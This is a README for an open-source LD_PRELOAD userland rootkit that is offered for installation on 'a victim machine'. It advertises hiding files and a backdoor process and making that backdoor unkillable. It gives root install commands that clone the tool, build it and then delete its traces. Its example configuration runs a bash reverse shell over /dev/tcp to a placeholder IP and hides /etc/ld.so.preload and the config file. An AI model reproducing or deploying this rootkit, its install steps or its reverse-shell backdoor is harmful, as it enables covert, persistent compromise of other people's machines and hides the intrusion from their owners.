Cerez is a configurable userland LD_PRELOAD
rootkit, by installing it
into /etc/ld.so.preload
, you can preload it before every binary.
It can protect/hide your backdoor as well other files you want
hidden. It does so by overwriting syscalls and functions like open
, unlinkat
etc.
- ✔ Hides files in the file system
- ✔ Hides your backdoor in the process list
- ❌ Hides connections in the network list
- ✔ Makes your backdoor unkillable
- ✔ Makes files unreadable
- ✔ Makes files unwriteable
Warning
Don't forget to edit cerez.cfg
before install
You can install it with apt
on debian systems:
apt update && apt install build-essential libconfig-dev
To install the rootkit on a victim machine run the following as ROOT:
git clone https://github.com/ngn13/cerez.git && cd cerez
make && make install
cd .. && rm -rf cerez
Configuration is (really) simple, in the backdoor
section,
leave your backdoor/malicious command, this will be run by the rootkit everytime a program starts (if its not already running).
Your backdoor will be hidden in the process list. It will
be also unkillable.
In the hidden
section, specify full paths for all the files that you want hidden.
backdoor = "bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'"
hidden = (
{ path = "/etc/cerez.cfg" },
{ path = "/etc/ld.so.preload" },
{ path = "/path/to/your/super/secret/file" }
);
To learn more about LD_PRELOAD
rootkits, I highly recommend you read this
article.
I also left some comments in the loader.c so you can go ahead and read it.
You can also create an issue/PR if you are interested.